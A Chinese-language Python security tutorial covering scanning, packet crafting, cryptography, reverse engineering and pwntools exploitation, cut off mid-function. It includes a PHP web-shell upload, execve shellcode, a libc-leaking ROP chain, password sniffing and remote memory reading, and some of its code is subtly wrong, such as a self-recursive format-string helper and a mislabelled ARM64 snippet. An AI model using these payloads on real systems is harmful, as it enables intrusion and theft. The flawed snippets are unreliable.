Skip to content

Python For Computer Security


计算机安全

Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety. — Benjamin Franklin

人们若以基本自由换取一时的安全保障,最终两者皆失。

免责声明

本文档仅用于**合法的安全研究、CTF 竞赛、授权渗透测试与安全教育**。未经授权对他人系统进行任何形式的安全测试属于违法行为。请在法律允许的范围内使用本文涉及的所有技术。

一、网络编程基础

网络安全的第一步是理解网络通信。Python 的标准库和第三方库提供了从原始套接字到高层 HTTP 请求的完整工具链。

Socket 编程

Socket 是网络通信的基石。几乎所有网络攻击工具的底层都依赖 socket 编程。

import socket
import threading

# ===== TCP 客户端 =====
def tcp_client(host, port):
    """基础 TCP 客户端:连接服务器,发送数据,接收响应"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        s.sendall(b"Hello, Server!\n")
        data = s.recv(4096)
        print(f"收到: {data.decode()}")

# ===== TCP 服务端 =====
def tcp_server(host, port):
    """基础 TCP 服务端:监听端口,接受连接"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((host, port))
        s.listen(5)
        print(f"监听 {host}:{port}...")
        while True:
            conn, addr = s.accept()
            with conn:
                print(f"连接来自 {addr}")
                data = conn.recv(4096)
                conn.sendall(b"ACK: " + data)

# ===== UDP 通信 =====
def udp_send(host, port, message):
    """UDP 发送(无连接,不保证送达)"""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(message.encode(), (host, port))
        data, addr = s.recvfrom(4096)
        print(f"收到来自 {addr}: {data.decode()}")

多线程服务器与端口扫描

import socket
import threading
from concurrent.futures import ThreadPoolExecutor

def simple_port_scan(host, port):
    """简单端口扫描:尝试 TCP 连接判断端口是否开放"""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)  # 1 秒超时
            result = s.connect_ex((host, port))  # 返回 0 表示成功
            if result == 0:
                try:
                    service = socket.getservbyport(port)
                except OSError:
                    service = "unknown"
                return port, True, service
    except (socket.timeout, socket.error):
        pass
    return port, False, ""

def scan_ports(host, ports, max_threads=100):
    """多线程端口扫描"""
    open_ports = []
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        futures = {
            executor.submit(simple_port_scan, host, port): port
            for port in ports
        }
        for future in futures:
            port, is_open, service = future.result()
            if is_open:
                open_ports.append((port, service))
                print(f"[+] {port}/tcp  OPEN  ({service})")
    return sorted(open_ports)

# 扫描常用端口
# common_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 993, 995, 3306, 3389, 5432, 8080, 8443]
# results = scan_ports("scanme.nmap.org", common_ports)

socket 常用方法速查

方法 说明
socket.socket(family, type) 创建套接字,AF_INET=IPv4, SOCK_STREAM=TCP, SOCK_DGRAM=UDP
s.connect((host, port)) 客户端连接服务器
s.bind((host, port)) 服务端绑定地址
s.listen(backlog) 开始监听
s.accept() 接受连接,返回 (conn, addr)
s.send(data) / s.sendall(data) 发送数据
s.recv(bufsize) 接收数据
s.settimeout(seconds) 设置超时
s.connect_ex((host, port)) 连接并返回错误码(0=成功),不会抛异常

HTTP 请求:requests 库

requests 是 Python 中最常用的 HTTP 客户端库,Web 安全工具几乎都依赖它。

import requests

# ===== 基本请求 =====
# GET 请求
resp = requests.get("https://httpbin.org/get", params={"key": "value"})
print(resp.status_code)     # 200
print(resp.headers)         # 响应头
print(resp.text)            # 响应体(文本)
print(resp.json())          # 响应体(解析为 JSON)
print(resp.content)         # 响应体(原始字节)

# POST 请求
resp = requests.post("https://httpbin.org/post",
                     data={"username": "admin", "password": "123456"})
# 或发送 JSON
resp = requests.post("https://httpbin.org/post",
                     json={"key": "value"})

# ===== 自定义 Headers =====
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "X-Forwarded-For": "127.0.0.1",       # 常用于绕过 IP 限制
    "Referer": "https://example.com",
    "Cookie": "session=abc123",
}
resp = requests.get("https://httpbin.org/headers", headers=headers)

# ===== Session(保持 Cookie/状态) =====
session = requests.Session()
session.headers.update({"User-Agent": "SecurityScanner/1.0"})

# 登录
login_resp = session.post("https://example.com/login",
                          data={"user": "admin", "pass": "secret"})
# 后续请求自动携带 Cookie
dashboard = session.get("https://example.com/dashboard")

# ===== 代理 =====
proxies = {
    "http": "http://127.0.0.1:8080",     # Burp Suite 默认代理
    "https": "http://127.0.0.1:8080",
}
resp = requests.get("https://httpbin.org/get", proxies=proxies,
                    verify=False)  # 忽略 SSL 证书验证

# ===== 文件上传 =====
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")}
resp = requests.post("https://example.com/upload", files=files)

# ===== 超时与异常处理 =====
try:
    resp = requests.get("https://example.com", timeout=5)
except requests.exceptions.Timeout:
    print("请求超时")
except requests.exceptions.ConnectionError:
    print("连接失败")

Scapy:网络包构造与嗅探

Scapy 是一个强大的交互式数据包操作库,能够构造、发送、嗅探和解析网络数据包。

from scapy.all import *

# ===== 构造数据包 =====
# 以太网帧
eth = Ether(dst="ff:ff:ff:ff:ff:ff", src="00:11:22:33:44:55")

# IP 层
ip = IP(src="192.168.1.100", dst="192.168.1.1")

# TCP 层
tcp = TCP(sport=12345, dport=80, flags="S")  # SYN 包

# 组装完整数据包
pkt = ip / tcp
print(pkt.show())       # 显示数据包结构
pkt_hex = hexdump(pkt)  # 十六进制

# ===== 发送数据包 =====
# 发送三层包(自动处理路由)
send(IP(dst="8.8.8.8") / ICMP())

# 发送二层包(需要指定接口)
sendp(Ether() / IP(dst="8.8.8.8") / ICMP(), iface="eth0")

# 发送并接收响应
ans = sr1(IP(dst="8.8.8.8") / ICMP(), timeout=3)
if ans:
    print(f"收到来自 {ans.src} 的响应")

# ===== TCP SYN 扫描 =====
def syn_scan(target, ports):
    """SYN 半开扫描:发送 SYN 包,根据响应判断端口状态"""
    results = {}
    for port in ports:
        pkt = IP(dst=target) / TCP(dport=port, flags="S")
        resp = sr1(pkt, timeout=1, verbose=0)
        if resp is None:
            results[port] = "filtered"
        elif resp.haslayer(TCP):
            if resp[TCP].flags == 0x12:     # SYN-ACK → 端口开放
                # 发送 RST 关闭连接
                send(IP(dst=target) / TCP(dport=port, flags="R"), verbose=0)
                results[port] = "open"
            elif resp[TCP].flags == 0x14:   # RST-ACK → 端口关闭
                results[port] = "closed"
        elif resp.haslayer(ICMP):
            results[port] = "filtered"
    return results

# ===== 嗅探数据包 =====
def packet_handler(pkt):
    """处理嗅探到的每个数据包"""
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = pkt[Raw].load
        if b"password" in payload or b"passwd" in payload:
            print(f"[!] 可疑流量: {pkt[IP].src}:{pkt[TCP].sport} -> "
                  f"{pkt[IP].dst}:{pkt[TCP].dport}")
            print(f"    载荷: {payload[:200]}")

# 嗅探 HTTP 流量
# sniff(filter="tcp port 80", prn=packet_handler, count=100, iface="eth0")

# ===== ARP 扫描(发现局域网主机)=====
def arp_scan(network):
    """ARP 扫描发现活跃主机"""
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network),
                 timeout=2, verbose=0)
    hosts = []
    for sent, received in ans:
        hosts.append((received[ARP].psrc, received[Ether].src))
        print(f"[+] {received[ARP].psrc}  ({received[Ether].src})")
    return hosts

# arp_scan("192.168.1.0/24")

# ===== DNS 查询 =====
def dns_query(domain, dns_server="8.8.8.8"):
    """手动构造 DNS 查询包"""
    pkt = IP(dst=dns_server) / UDP(dport=53) / DNS(
        rd=1,
        qd=DNSQR(qname=domain)
    )
    resp = sr1(pkt, timeout=3, verbose=0)
    if resp and resp.haslayer(DNS):
        for i in range(resp[DNS].ancount):
            rr = resp[DNS].an[i]
            print(f"{rr.rname.decode()} -> {rr.rdata}")

二、密码学

Python 拥有丰富的密码学库,覆盖从基础哈希到高级加密算法的完整工具链。

hashlib:哈希函数

哈希(摘要)函数是密码学的基石——将任意长度的输入映射为固定长度的输出,且不可逆。

import hashlib
import hmac

# ===== 常用哈希算法 =====
data = b"Hello, Security!"

# MD5(已不安全,但仍常用于校验完整性)
md5 = hashlib.md5(data).hexdigest()
print(f"MD5:    {md5}")        # 32 个十六进制字符

# SHA-1(已不安全,Git 仍在使用)
sha1 = hashlib.sha1(data).hexdigest()
print(f"SHA-1:  {sha1}")       # 40 个十六进制字符

# SHA-256(目前推荐)
sha256 = hashlib.sha256(data).hexdigest()
print(f"SHA-256:{sha256}")     # 64 个十六进制字符

# SHA-512
sha512 = hashlib.sha512(data).hexdigest()
print(f"SHA-512:{sha512}")     # 128 个十六进制字符

# ===== 分块计算(处理大文件) =====
h = hashlib.sha256()
with open("large_file.bin", "rb") as f:
    while chunk := f.read(8192):    # walrus operator (:=),Python 3.8+
        h.update(chunk)
file_hash = h.hexdigest()
print(f"文件 SHA-256: {file_hash}")

# ===== HMAC(基于哈希的消息认证码)=====
# HMAC = Hash(key + Hash(key + message))
# 用于验证消息完整性和真实性
key = b"secret_key"
message = b"important data"
mac = hmac.new(key, message, hashlib.sha256).hexdigest()
print(f"HMAC-SHA256: {mac}")

# 验证 HMAC(防止时序攻击)
is_valid = hmac.compare_digest(mac, expected_mac)

哈希算法安全性速查

算法 输出长度 安全性 常见用途
MD5 128 bit 已破解(碰撞攻击) 文件校验、非安全场景
SHA-1 160 bit 已破解(碰撞攻击) Git commit hash
SHA-256 256 bit 安全 数字签名、区块链、证书
SHA-512 512 bit 安全 高安全需求场景
SHA-3 可变 安全(不同结构) 后量子密码学准备

密码哈希:bcrypt / argon2

存储用户密码时,绝不能使用普通哈希函数——必须使用专门的密码哈希算法(加盐 + 慢哈希)。

# pip install bcrypt
import bcrypt

# 注册:哈希密码
password = b"my_secure_password"
salt = bcrypt.gensalt(rounds=12)        # rounds 越大越慢(防暴力破解)
hashed = bcrypt.hashpw(password, salt)
print(f"哈希结果: {hashed}")             # 包含算法版本、轮次、盐值、哈希值

# 登录:验证密码
is_valid = bcrypt.checkpw(password, hashed)      # True
is_wrong = bcrypt.checkpw(b"wrong", hashed)      # False

# pip install argon2-cffi(Argon2:密码哈希竞赛冠军)
from argon2 import PasswordHasher
ph = PasswordHasher(time_cost=3, memory_cost=65536, parallelism=4)
hash_str = ph.hash("my_secure_password")
is_valid = ph.verify(hash_str, "my_secure_password")  # True

对称加密:AES

对称加密使用同一密钥加密和解密。

# pip install pycryptodome
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad

# ===== AES-CBC 模式 =====
key = get_random_bytes(32)          # AES-256: 32 字节密钥
iv = get_random_bytes(16)           # 16 字节初始向量

# 加密
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = b"Top secret message about 疾旋鼬!"
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
print(f"密文(hex): {ciphertext.hex()}")

# 解密
decipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = unpad(decipher.decrypt(ciphertext), AES.block_size)
print(f"解密结果: {decrypted.decode()}")

# ===== AES-GCM 模式(推荐:认证加密,同时提供保密性和完整性)=====
key = get_random_bytes(32)
cipher = AES.new(key, AES.MODE_GCM)
plaintext = b"Secret data"
ciphertext, tag = cipher.encrypt_and_digest(plaintext)
print(f"密文: {ciphertext.hex()}")
print(f"认证标签: {tag.hex()}")

# 解密 + 验证
decipher = AES.new(key, AES.MODE_GCM, nonce=cipher.nonce)
decrypted = decipher.decrypt_and_verify(ciphertext, tag)  # 验证失败会抛异常

非对称加密:RSA

非对称加密使用公钥加密、私钥解密,是 HTTPS、数字签名的基础。

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256

# ===== 生成 RSA 密钥对 =====
key = RSA.generate(2048)
private_key = key
public_key = key.publickey()

# 导出为 PEM 格式
private_pem = private_key.export_key()
public_pem = public_key.export_key()

# 保存到文件
with open("private.pem", "wb") as f:
    f.write(private_pem)
with open("public.pem", "wb") as f:
    f.write(public_pem)

# 从文件加载
with open("private.pem", "rb") as f:
    private_key = RSA.import_key(f.read())

# ===== RSA 加密(适合加密少量数据,如对称密钥)=====
cipher = PKCS1_OAEP.new(public_key)
ciphertext = cipher.encrypt(b"Short secret")
print(f"RSA 密文长度: {len(ciphertext)} 字节")

# 解密
decipher = PKCS1_OAEP.new(private_key)
plaintext = decipher.decrypt(ciphertext)
print(f"解密: {plaintext.decode()}")

# ===== RSA 数字签名 =====
message = b"Important document"
h = SHA256.new(message)
signature = pkcs1_15.new(private_key).sign(h)
print(f"签名: {signature.hex()}")

# 验证签名
try:
    h = SHA256.new(message)
    pkcs1_15.new(public_key).verify(h, signature)
    print("签名验证成功")
except (ValueError, TypeError):
    print("签名验证失败!文件可能被篡改")

常见编码与解码

安全工具中经常需要在不同编码格式之间转换。

import base64
import binascii
import urllib.parse

data = b"admin:password123"

# Base64 编码/解码(常用于 HTTP Basic Auth、数据混淆)
b64 = base64.b64encode(data)
print(f"Base64: {b64.decode()}")       # YWRtaW46cGFzc3dvcmQxMjM=
decoded = base64.b64decode(b64)
print(f"解码: {decoded.decode()}")

# Base64 URL 安全变体
b64url = base64.urlsafe_b64encode(data)

# URL 编码/解码(Web 安全中处理特殊字符)
encoded = urllib.parse.quote("SELECT * FROM users WHERE name='admin'")
print(f"URL编码: {encoded}")            # SELECT%20*%20FROM%20...
decoded = urllib.parse.unquote(encoded)

# Hex 编码/解码
hex_str = binascii.hexlify(data).decode()
print(f"Hex: {hex_str}")               # 61646d696e3a7061...
raw = binascii.unhexlify(hex_str)

# 十六进制与字节互转(内置方法)
hex_bytes = data.hex()                  # bytes -> hex str
raw_bytes = bytes.fromhex(hex_bytes)    # hex str -> bytes

# ROT13(凯撒密码的一种特例)
import codecs
rot13 = codecs.encode("attack at dawn", "rot_13")
print(f"ROT13: {rot13}")               # nggnpx ng qnja
original = codecs.decode(rot13, "rot_13")

三、二进制分析与逆向工程

struct:二进制数据打包与解包

struct 是 Python 标准库中处理二进制数据的核心工具,用于将 Python 值与 C 结构体之间转换。

import struct

# ===== 打包(Python 值 → 二进制字节)=====
# 常用格式字符:
# < 小端序, > 大端序
# B unsigned char (1字节), H unsigned short (2字节), I unsigned int (4字节)
# Q unsigned long long (8字节), i signed int, f float, d double

# 构造一个 ELF 文件头的一部分
e_ident = b'\x7fELF'           # ELF 魔数
e_type = 2                     # ET_EXEC (可执行文件)
e_machine = 62                 # EM_X86_64
e_version = 1                  # EV_CURRENT

header = struct.pack('<4sHHI', e_ident, e_type, e_machine, e_version)
print(f"打包结果: {header.hex()}")
# 7f454c46 0200 3e00 01000000

# ===== 解包(二进制字节 → Python 值)=====
ident, etype, machine, version = struct.unpack('<4sHHI', header[:12])
print(f"魔数: {ident}, 类型: {etype}, 架构: {machine}")

# ===== calcsize:计算结构体大小 =====
print(f"<4sHHI 大小: {struct.calcsize('<4sHHI')} 字节")  # 12

# ===== 处理文件中的二进制数据 =====
def parse_pe_header(filepath):
    """解析 PE 文件的 DOS Header"""
    with open(filepath, 'rb') as f:
        # IMAGE_DOS_HEADER 的前几个字段
        dos_header = f.read(64)
        magic = dos_header[0:2]
        if magic != b'MZ':
            print("不是有效的 PE 文件")
            return None

        # e_lfanew: PE 头的偏移量(位于偏移 0x3C 处)
        e_lfanew = struct.unpack('<I', dos_header[0x3C:0x40])[0]
        print(f"PE 头偏移: 0x{e_lfanew:X}")

        # 跳转到 PE 头
        f.seek(e_lfanew)
        pe_signature = f.read(4)
        if pe_signature != b'PE\x00\x00':
            print("无效的 PE 签名")
            return None

        # COFF Header
        machine, num_sections, timestamp = struct.unpack('<HHI', f.read(8))
        machine_names = {0x14c: "x86", 0x8664: "x86_64", 0xAA64: "ARM64"}
        print(f"架构: {machine_names.get(machine, 'Unknown')}")
        print(f"节区数量: {num_sections}")
        return e_lfanew

# ===== 构造网络协议数据包 =====
def build_dns_query(domain):
    """手动构造 DNS 查询报文"""
    # DNS Header
    tx_id = 0x1234
    flags = 0x0100      # 标准查询,期望递归
    qdcount = 1
    header = struct.pack('>HHHHHH', tx_id, flags, qdcount, 0, 0, 0)

    # DNS Question: 域名编码
    question = b''
    for label in domain.split('.'):
        question += struct.pack('B', len(label)) + label.encode()
    question += b'\x00'                         # 域名结束
    question += struct.pack('>HH', 1, 1)        # QTYPE=A, QCLASS=IN

    return header + question

ctypes:调用 C 代码与操作内存

ctypes 允许 Python 调用 C 动态链接库,在漏洞分析和利用中极其重要。

import ctypes
import ctypes.wintypes as wintypes

# ===== 调用 libc =====
libc = ctypes.CDLL("libc.so.6")         # Linux
# libc = ctypes.CDLL("msvcrt.dll")     # Windows

# 调用 C 的 printf
libc.printf(b"Hello from C! %d\n", 42)

# 调用 C 的 malloc/free
libc.malloc.restype = ctypes.c_void_p
libc.malloc.argtypes = [ctypes.c_size_t]
ptr = libc.malloc(1024)
print(f"分配的内存地址: 0x{ptr:x}")
libc.free(ptr)

# ===== 自定义 C 结构体 =====
class Elf64_Ehdr(ctypes.Structure):
    """ELF64 文件头结构体"""
    _fields_ = [
        ("e_ident",     ctypes.c_char * 16),   # ELF 标识
        ("e_type",      ctypes.c_uint16),       # 文件类型
        ("e_machine",   ctypes.c_uint16),       # 目标架构
        ("e_version",   ctypes.c_uint32),       # 版本
        ("e_entry",     ctypes.c_uint64),       # 入口点地址
        ("e_phoff",     ctypes.c_uint64),       # 程序头表偏移
        ("e_shoff",     ctypes.c_uint64),       # 节头表偏移
        ("e_flags",     ctypes.c_uint32),       # 标志
        ("e_ehsize",    ctypes.c_uint16),       # 文件头大小
        ("e_phentsize", ctypes.c_uint16),       # 程序头条目大小
        ("e_phnum",     ctypes.c_uint16),       # 程序头条目数
        ("e_shentsize", ctypes.c_uint16),       # 节头条目大小
        ("e_shnum",     ctypes.c_uint16),       # 节头条目数
        ("e_shstrndx",  ctypes.c_uint16),       # 节名字符串表索引
    ]

def parse_elf_header(filepath):
    """使用 ctypes 解析 ELF 文件头"""
    with open(filepath, 'rb') as f:
        raw = f.read(ctypes.sizeof(Elf64_Ehdr))
        ehdr = Elf64_Ehdr.from_buffer_copy(raw)

    if ehdr.e_ident[:4] != b'\x7fELF':
        print("不是 ELF 文件")
        return

    print(f"入口点: 0x{ehdr.e_entry:x}")
    print(f"程序头偏移: 0x{ehdr.e_phoff:x}")
    print(f"节头偏移: 0x{ehdr.e_shoff:x}")
    print(f"程序头数量: {ehdr.e_phnum}")

# ===== Windows API 调用(进程注入等场景)=====
def read_remote_memory(pid, address, size):
    """读取远程进程内存(Windows)"""
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    PROCESS_VM_READ = 0x0010
    handle = kernel32.OpenProcess(PROCESS_VM_READ, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())

    buffer = ctypes.create_string_buffer(size)
    bytes_read = ctypes.c_size_t(0)

    kernel32.ReadProcessMemory(
        handle,
        ctypes.c_void_p(address),
        buffer,
        size,
        ctypes.byref(bytes_read)
    )
    kernel32.CloseHandle(handle)
    return buffer.raw[:bytes_read.value]

pefile:PE 文件分析

# pip install pefile
import pefile

def analyze_pe(filepath):
    """分析 PE 文件结构"""
    pe = pefile.PE(filepath)

    # 基本信息
    print(f"入口点: 0x{pe.OPTIONAL_HEADER.AddressOfEntryPoint:X}")
    print(f"镜像基址: 0x{pe.OPTIONAL_HEADER.ImageBase:X}")
    print(f"子系统: {pe.OPTIONAL_HEADER.Subsystem}")
    print(f"时间戳: {pe.FILE_HEADER.TimeDateStamp}")

    # 节区信息
    print("\n=== 节区 ===")
    for section in pe.sections:
        name = section.Name.decode().rstrip('\x00')
        vsize = section.Misc_VirtualSize
        rsize = section.SizeOfRawData
        chars = section.Characteristics
        flags = []
        if chars & 0x20:    flags.append("CODE")
        if chars & 0x40:    flags.append("INITIALIZED_DATA")
        if chars & 0x80:    flags.append("UNINITIALIZED_DATA")
        if chars & 0x20000000: flags.append("EXECUTE")
        if chars & 0x40000000: flags.append("READ")
        if chars & 0x80000000: flags.append("WRITE")
        print(f"  {name:10s} VSize=0x{vsize:08X} RSize=0x{rsize:08X} "
              f"Flags={'+'.join(flags)}")

    # 导入表
    print("\n=== 导入表 ===")
    if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
        for entry in pe.DIRECTORY_ENTRY_IMPORT:
            dll_name = entry.dll.decode()
            print(f"  {dll_name}:")
            for imp in entry.imports:
                if imp.name:
                    print(f"    {imp.name.decode()} (0x{imp.address:08X})")
                else:
                    print(f"    Ordinal#{imp.ordinal} (0x{imp.address:08X})")

    # 导出表
    if hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):
        print("\n=== 导出表 ===")
        for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
            if exp.name:
                print(f"  {exp.name.decode()} (0x{exp.address:08X})")

    return pe

# analyze_pe("target.exe")

Capstone:反汇编引擎

Capstone 是一个多架构反汇编框架,支持 x86、ARM、MIPS 等。

# pip install capstone
from capstone import *

def disassemble_bytes(code_bytes, arch=CS_ARCH_X86, mode=CS_MODE_64, base_addr=0x400000):
    """反汇编字节码"""
    md = Cs(arch, mode)
    md.detail = True        # 启用详细信息

    for insn in md.disasm(code_bytes, base_addr):
        print(f"0x{insn.address:08X}:  {insn.mnemonic:8s} {insn.op_str}")
        # 示例输出:
        # 0x00400000:  push     rbp
        # 0x00400001:  mov      rbp, rsp
        # 0x00400004:  sub      rsp, 0x20

# x86-64 常见指令的机器码
code = b"\x55\x48\x89\xe5\x48\x83\xec\x20\xc7\x45\xfc\x00\x00\x00\x00"
disassemble_bytes(code)

# ARM64
arm64_code = b"\x00\x00\xa0\xe3"    # mov r0, #0
md_arm = Cs(CS_ARCH_ARM, CS_MODE_ARM)
for insn in md_arm.disasm(arm64_code, 0x8000):
    print(f"0x{insn.address:04X}:  {insn.mnemonic:8s} {insn.op_str}")

# ===== 分析 ELF 中的 .text 段 =====
def disassemble_elf_text(filepath):
    """反汇编 ELF 文件的代码段"""
    import lief
    binary = lief.parse(filepath)
    text_section = binary.get_section(".text")
    if text_section:
        code = bytes(text_section.content)
        base = text_section.virtual_address
        print(f".text 段: 偏移=0x{base:X}, 大小={len(code)} 字节")
        disassemble_bytes(code, base_addr=base)

Unicorn:CPU 模拟器

Unicorn 可以模拟执行机器码,非常适合分析 shellcode 或在不运行完整程序的情况下测试代码片段。

# pip install unicorn
from unicorn import *
from unicorn.x86_const import *

def emulate_shellcode(shellcode, base_addr=0x1000000):
    """模拟执行 x86-64 shellcode"""
    # 初始化模拟器: x86-64
    mu = Uc(UC_ARCH_X86, UC_MODE_64)

    # 映射内存: 2MB
    mu.mem_map(base_addr, 2 * 1024 * 1024)

    # 写入 shellcode
    mu.mem_write(base_addr, shellcode)

    # 设置栈(x86 栈向低地址增长)
    stack_base = 0x2000000
    mu.mem_map(stack_base, 2 * 1024 * 1024)
    mu.reg_write(UC_X86_REG_RSP, stack_base + 1024 * 1024)

    # Hook:跟踪每条指令
    def hook_code(mu, address, size, user_data):
        code = mu.mem_read(address, size)
        print(f"执行: 0x{address:08X}  {code.hex()}")

    mu.hook_add(UC_HOOK_CODE, hook_code)

    # 执行
    try:
        mu.emu_start(base_addr, base_addr + len(shellcode), timeout=5 * UC_SECOND_SCALE)
    except UcError as e:
        print(f"模拟终止: {e}")

    # 读取寄存器状态
    rax = mu.reg_read(UC_X86_REG_RAX)
    rbx = mu.reg_read(UC_X86_REG_RBX)
    print(f"RAX = 0x{rax:016X}")
    print(f"RBX = 0x{rbx:016X}")

# 模拟一段简单的 shellcode(x86-64: mov rax, 42; ret)
simple_shellcode = b"\x48\xc7\xc0\x2a\x00\x00\x00\xc3"
emulate_shellcode(simple_shellcode)

angr:二进制分析框架

angr 是一个功能强大的二进制分析平台,支持符号执行、约束求解、控制流图恢复等。

# pip install angr
import angr
import claripy

def find_vulnerability(binary_path):
    """使用符号执行寻找程序中的漏洞路径"""
    # 加载二进制文件
    proj = angr.Project(binary_path, auto_load_libs=False)

    # 创建初始状态(从 main 函数开始)
    state = proj.factory.entry_state()

    # 创建模拟管理器
    simgr = proj.factory.simulation_manager(state)

    # 符号执行:寻找到达 "success" 和 "failure" 的路径
    # find: 目标地址(成功路径)
    # avoid: 要避免的地址(失败路径)
    # simgr.explore(find=0x401234, avoid=0x401256)

    # 或者通过 hook 寻找
    def is_successful(state):
        # 检查是否到达了某个成功的输出
        stdout = state.posix.dumps(1)   # stdout
        return b"success" in stdout

    def should_abort(state):
        stdout = state.posix.dumps(1)
        return b"fail" in stdout

    simgr.explore(find=is_successful, avoid=should_abort)

    if simgr.found:
        found_state = simgr.found[0]
        print("[+] 找到成功路径!")
        # 获取输入(即触发成功路径的输入)
        input_data = found_state.posix.dumps(0)  # stdin
        print(f"    输入: {input_data}")
        return input_data
    else:
        print("[-] 未找到成功路径")
        return None

# ===== 控制流图(CFG)分析 =====
def analyze_cfg(binary_path):
    """分析程序的控制流图"""
    proj = angr.Project(binary_path, auto_load_libs=False)
    cfg = proj.analyses.CFGFast()

    # 获取所有函数
    for func_addr, func in cfg.kb.functions.items():
        print(f"函数: {func.name} @ 0x{func_addr:X}")
        # 基本块数量
        print(f"  基本块数: {len(func.blocks)}")
        # 调用的函数
        for callee in func.functions_called():
            print(f"  调用: {callee.name}")

pwntools:漏洞利用开发工具包

pwntools 是 CTF 和漏洞利用开发中最核心的 Python 库,提供了从交互式通信到 ROP 链构建的全套工具。

# pip install pwntools
from pwn import *

# ===== 远程连接与本地进程 =====
# 连接远程服务
# r = remote("challenge.example.com", 1337)

# 本地运行程序
# p = process("./vuln")

# ===== 打包/解包(自动处理架构)=====
# 32 位
print(p32(0xdeadbeef))              # b'\xef\xbe\xad\xde'(小端序)
print(u32(b'\xef\xbe\xad\xde'))     # 0xdeadbeef

# 64 位
print(p64(0x4141414141414141))      # b'AAAAAAAA'
print(u64(b'AAAAAAAA'))             # 0x4141414141414141

# ===== ELF 文件分析 =====
elf = ELF("./vuln")
print(f"入口点: 0x{elf.entry:x}")
print(f"main:   0x{elf.symbols['main']:x}")
print(f"puts:   0x{elf.plt['puts']:x}")       # PLT 表地址
print(f"puts:   0x{elf.got['puts']:x}")       # GOT 表地址

# 查找 gadgets
# rop = ROP(elf)
# rop.call("puts", [elf.got["puts"]])
# print(rop.dump())

# ===== 构造 ROP 链 =====
def build_rop_chain(elf_path):
    """构造基础 ROP 链(64 位 Linux)"""
    elf = ELF(elf_path)
    rop = ROP(elf)

    # 自动寻找 gadgets
    pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]    # 控制第一个参数
    ret = rop.find_gadget(["ret"])[0]                    # 用于栈对齐

    log.info(f"pop rdi; ret @ 0x{pop_rdi:x}")
    log.info(f"ret @ 0x{ret:x}")

    # 构造 ROP 链
    payload = b'A' * 72                 # padding(覆盖到返回地址)

    # 调用 puts(puts@GOT) 泄露 puts 的真实地址
    payload += p64(pop_rdi)
    payload += p64(elf.got['puts'])
    payload += p64(elf.plt['puts'])

    # 返回 main,执行第二次溢出
    payload += p64(elf.symbols['main'])

    return payload

# ===== Shellcode =====
def get_shellcode():
    """生成执行 execve("/bin/sh") 的 shellcode"""
    context.arch = 'amd64'     # 设置目标架构
    # 或 context.arch = 'i386'

    # 自动生成 shellcode
    sc = asm(shellcraft.sh())
    log.info(f"Shellcode 长度: {len(sc)} 字节")
    return sc

# 手动构造 shellcode(x86-64 execve /bin/sh)
shellcode = (
    b"\x48\x31\xf6"                        # xor rsi, rsi
    b"\x48\x31\xd2"                        # xor rdx, rdx
    b"\x48\xbb\x2f\x62\x69\x6e\x2f"       # mov rbx, '/bin/sh'
    b"\x73\x68\x00"
    b"\x53"                                # push rbx
    b"\x48\x89\xe7"                        # mov rdi, rsp
    b"\x48\x31\xc0"                        # xor rax, rax
    b"\xb0\x3b"                            # mov al, 59 (execve)
    b"\x0f\x05"                            # syscall
)

# ===== 格式化字符串漏洞利用 =====
def fmtstr_payload(offset, writes):
    """
    构造格式化字符串攻击载荷
    offset: 格式化字符串在栈上的偏移
    writes: {地址: 值} 的字典
    """
    # 示例: 将 0xdeadbeef 写入地址 0x0804A000
    payload = fmtstr_payload(6, {0x0804A000: 0xdeadbeef})
    return payload

# ===== 交互式利用模板 =====
def exploit_template():
    """标准漏洞利用模板"""
    context.arch = 'amd64'
    context.log_level = 'info'

    # p = process("./vuln")
    # 或
    # p = remote("challenge.ctf.com", 1337)

    # 接收提示信息
    # p.recvuntil(b"Enter your name: ")

    # 发送 payload
    # payload = b'A' * offset + p64(target_addr)
    # p.sendline(payload)

    # 切换到交互模式(获取 shell)
    # p.interactive()

    pass

GDB Python API:动态调试

# 在 GDB 中运行 Python 脚本(GDB 内置 Python 支持)
# gdb -x script.py ./target

import gdb

def set_break_at_func(func_name):
    """在函数入口设置断点"""
    bp = gdb.Breakpoint(func_name)
    return bp

def get_registers():
    """获取当前寄存器值"""
    regs = {}
    for name in ["rax", "rbx", "rcx", "rdx", "rsi", "rdi",
                  "rsp", "rbp", "rip", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]:
        try:
            val = gdb.parse_and_eval(f"${name}")
            regs[name] = int(val)
        except:
            pass
    return regs

def read_memory(address, size):
    """读取内存"""
    inferior = gdb.selected_inferior()
    return inferior.read_memory(address, size)

def backtrace():
    """获取调用栈"""
    bt = gdb.execute("bt", to_string=True)
    return bt

# GDB Python 脚本示例:自动分析栈溢出
def analyze_stack_frame():
    """分析当前栈帧,寻找溢出点"""
    rsp = int(gdb.parse_and_eval("$rsp"))
    rbp = int(gdb.parse_and_eval("$rbp"))
